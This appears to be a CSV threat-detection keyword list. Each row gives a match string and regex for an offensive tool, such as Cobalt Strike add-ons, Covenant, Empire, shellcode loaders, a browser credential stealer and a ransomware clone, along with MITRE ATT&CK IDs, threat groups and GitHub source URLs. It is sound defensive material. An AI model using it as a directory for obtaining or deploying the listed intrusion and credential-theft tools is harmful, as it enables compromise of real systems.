"*cobaltclip.exe*",".{0,1000}cobaltclip\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 
- T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*cobaltstrike *",".{0,1000}cobaltstrike\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider 
- Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*cobaltstrike*",".{0,1000}cobaltstrike.{0,1000}","offensive_tool_keyword","cobaltstrike","cobaltstrike binary for windows - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network. While penetration tests focus on unpatched vulnerabilities and misconfigurations. these assessments benefit security operations and incident response.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*cobaltstrike-*",".{0,1000}cobaltstrike\-.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - 
T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*cobalt-strike*",".{0,1000}cobalt\-strike.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*-cobaltstrike*",".{0,1000}\-cobaltstrike.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*cobaltstrike.*",".{0,1000}cobaltstrike\..{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*cobaltstrike.store*",".{0,1000}cobaltstrike\.store.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","288","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*cobaltstrike/*",".{0,1000}cobaltstrike\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Cobalt-Strike/bof_template*",".{0,1000}Cobalt\-Strike\/bof_template.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","1","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*cobaltstrike_*",".{0,1000}cobaltstrike_.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments 
that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*cobaltstrike-dist.tgz*",".{0,1000}cobaltstrike\-dist\.tgz.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","10","10","204","46","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*cobaltstrike-nemesis-connector*",".{0,1000}cobaltstrike\-nemesis\-connector.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource 
Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*cobbr/Covenant*",".{0,1000}cobbr\/Covenant.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*cobbr/Elite*",".{0,1000}cobbr\/Elite.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*cobbr/PSAmsi*",".{0,1000}cobbr\/PSAmsi.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*cobbr/SharpSploit*",".{0,1000}cobbr\/SharpSploit.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation 
tools","https://github.com/cobbr/SharpSploit","1","1","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*code_execution/*.dll*",".{0,1000}code_execution\/.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","empire","Empire dll paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1075","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*code_execution/*.exe*",".{0,1000}code_execution\/.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","empire","Empire executable paths. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1135","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*code_execution/*.ps1*",".{0,1000}code_execution\/.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1136","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Coded by LimerBoy <3*",".{0,1000}Coded\sby\sLimerBoy\s\<3.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","10","8","747","201","2022-12-08T11:06:46Z","2020-03-01T06:50:15Z" "*CodeExec-D37DA402-3829-492F-90D0-8EC3909514EB.json*",".{0,1000}CodeExec\-D37DA402\-3829\-492F\-90D0\-8EC3909514EB\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - 
TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*CodeLoad(shellcode)*",".{0,1000}CodeLoad\(shellcode\).{0,1000}","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Axx8/ShellCode_Loader","1","0","N/A","10","10","401","48","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z" "*codeLoader/codeLoader.*",".{0,1000}codeLoader\/codeLoader\..{0,1000}","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","10","10","594","111","2023-12-28T15:23:19Z","2021-01-19T15:57:01Z" "*codesiddhant/jasmin-ransomware*",".{0,1000}codesiddhant\/jasmin\-ransomware.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*codewatchorg/bypasswaf*",".{0,1000}codewatchorg\/bypasswaf.{0,1000}","offensive_tool_keyword","bypasswaf","Add headers to all Burp requests to bypass some WAF products","T1090 - T1189 - T1001","TA0002 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/bypasswaf","1","1","N/A","N/A","4","326","109","2018-01-28T13:13:39Z","2014-11-17T01:29:35Z" "*codewatchorg/sqlipy*",".{0,1000}codewatchorg\/sqlipy.{0,1000}","offensive_tool_keyword","sqlipy","SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.","T1190 - T1210 - T1574","TA0002 - TA0040 - TA0043","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/sqlipy","1","1","N/A","N/A","3","250","95","2023-05-08T18:50:41Z","2014-09-22T03:25:42Z" 
